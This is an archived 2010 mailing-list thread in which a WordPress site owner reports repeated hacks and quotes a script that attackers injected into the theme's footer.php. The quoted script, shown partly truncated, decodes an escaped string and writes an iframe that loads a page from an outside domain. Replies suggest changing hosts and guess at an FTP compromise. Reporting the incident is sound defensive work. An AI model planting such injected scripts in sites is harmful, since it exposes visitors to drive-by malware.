[wp-hackers] wordpress theme script injection (hosted on dreamhost)
banago at gmail.com
Sun Oct 31 15:27:34 UTC 2010
I agree with Vid - try switching hosts first.
www.wplancer.com | www.banago.info | www.lintuts.com
On 31 October 2010 16:17, Vid Luther <vid at zippykid.com> wrote:
> Instead of switching platforms completely, I would recommend first
> changing hosts, go with mediatemple, godaddy, rackspace, page.ly,
> wpengine, my company, or even godaddy.. their UI sucks, but their phone
> support is fairly decent.
> As for the exploit, it may not be a wordpress exploit, but an ftp
> attack, as it's just looking for filesystem paths and injecting to it.
> I'm assuming by default theme footer, you meant twentyten theme, and
> footer.php ?
> Mladen Adamovic wrote:
> > Hi guys,
> > My wordpress software instance was repeatedly hacked ... running latest
> > Wordpress source code and being hosted on Dreamhost.
> > I don't know which exploit it did use and couldn't identify it, but it
> > adding the following code to my default theme footer.php:
> > <script>
> > enc =
> > withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> > I think I'll have to migrate to Blogger, since I couldn't identify
> > it did use.
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
> Vid Luther
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
More information about the wp-hackers